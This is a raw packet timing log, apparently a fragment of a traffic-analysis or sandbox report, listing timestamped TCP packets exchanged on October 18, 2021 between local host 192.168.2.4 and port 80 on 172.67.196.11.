                                                                    Oct 18, 2021 08:02:35.506896019 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.506901026 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.506928921 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.506952047 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.506959915 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.506980896 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.506999969 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.507030010 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.507035017 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.507050037 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.507066965 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.507080078 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.507100105 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.507106066 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.507153034 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.507157087 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.507219076 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.507250071 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.507251978 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.507277012 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.507283926 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.507302999 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.507317066 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.507348061 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.507354021 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.507380962 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.507388115 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.507395983 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.507414103 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.507435083 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.507464886 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.507469893 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.507499933 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.507520914 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.507531881 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.507565975 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.507566929 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.507597923 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.507611036 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.507630110 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.507639885 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.507661104 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.507673979 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.507693052 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.507733107 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.507738113 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.507771015 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.507802963 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.507836103 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.507858038 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.507865906 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.507869005 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.507889986 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.507900000 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.507916927 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.507932901 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.507941961 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.507965088 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.507981062 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.508006096 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.508033991 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.508040905 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.508059025 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.508074045 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.508083105 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.508106947 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.508119106 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.508141041 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.508172989 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.508188963 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.508204937 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.508219957 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.508236885 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.508256912 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.508276939 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.508292913 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.508313894 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.508327007 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.508344889 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.508357048 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.508378983 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.508410931 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.508426905 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.508441925 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.508460045 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.508474112 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.508506060 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.508506060 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.508513927 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.508544922 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.508579969 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.508601904 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.508613110 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.508630991 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.508646011 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.508658886 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.508677959 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.508688927 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.508708954 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.508727074 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.508750916 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.508786917 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.508799076 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.508817911 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.508830070 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.508851051 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.508865118 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.508882999 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.508923054 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.508935928 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.508960009 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.508990049 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509013891 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.509023905 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509035110 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.509056091 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509068966 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.509087086 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509093046 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.509119034 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509134054 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.509150982 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509162903 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.509191990 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509227037 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509238005 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.509258986 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509268999 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.509293079 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509298086 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.509324074 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509356022 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509373903 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.509387970 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509401083 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.509419918 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509429932 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.509459019 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509463072 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.509495020 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509500027 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.509526014 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509542942 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.509558916 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509568930 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.509591103 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509622097 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.509622097 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509651899 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.509654045 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509673119 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.509685993 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509695053 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.509726048 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509763002 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509773970 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.509808064 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.509814024 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509825945 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509844065 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509875059 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.509876966 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.509900093 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.509928942 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.525856018 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.525895119 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.525924921 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.525926113 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.525949955 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.525958061 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.525978088 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.525996923 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526004076 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.526031971 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526062965 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526074886 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.526086092 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526112080 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526134968 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526158094 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526179075 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.526192904 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526201963 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.526210070 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526235104 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.526247978 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526251078 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.526282072 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526309967 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526323080 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.526343107 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526369095 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.526372910 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526384115 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.526402950 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526423931 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.526432991 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526456118 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.526463032 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526479006 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.526500940 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526534081 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526560068 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.526562929 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526592970 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526603937 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.526622057 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526649952 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.526650906 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526676893 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.526679993 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526709080 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526746035 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.526747942 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526760101 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.526782036 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526808977 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.526813030 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.526834965 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526865005 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526895046 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526901007 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.526923895 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526933908 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.526953936 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526968002 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.526984930 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.526998043 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527021885 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527034044 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527055025 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527085066 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527105093 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527132988 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527168036 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527179956 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527203083 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527220011 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527250051 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527275085 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527278900 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527295113 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527307987 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527329922 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527338028 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527352095 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527374983 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527384996 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527409077 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527437925 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527458906 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527467966 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527483940 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527498007 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527513981 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527527094 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527558088 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527566910 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527585030 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527587891 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527625084 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527647018 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527654886 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527657032 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527666092 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527686119 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527717113 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527719975 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527729988 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527746916 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527761936 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527776003 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527802944 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527806044 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527828932 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527836084 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527852058 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527872086 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527889013 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527905941 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527915955 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527935982 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527949095 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527966022 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.527977943 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.527996063 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.528024912 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.528044939 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.528057098 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.528085947 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.528104067 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.528119087 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.528122902 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.528156042 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.528166056 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.528184891 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.528198004 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.528214931 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.528224945 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.528244972 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.528263092 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.528274059 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.528286934 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.528302908 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.528316975 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.528332949 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.528348923 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.528367996 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.528368950 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.528429985 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.528460026 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.528481007 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.528506041 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.528539896 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.528568029 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.528570890 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.528599024 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.528600931 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.528629065 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.528637886 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.528657913 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.528659105 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.528686047 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.528687000 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.528724909 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.528731108 CEST4981680192.168.2.4172.67.196.11
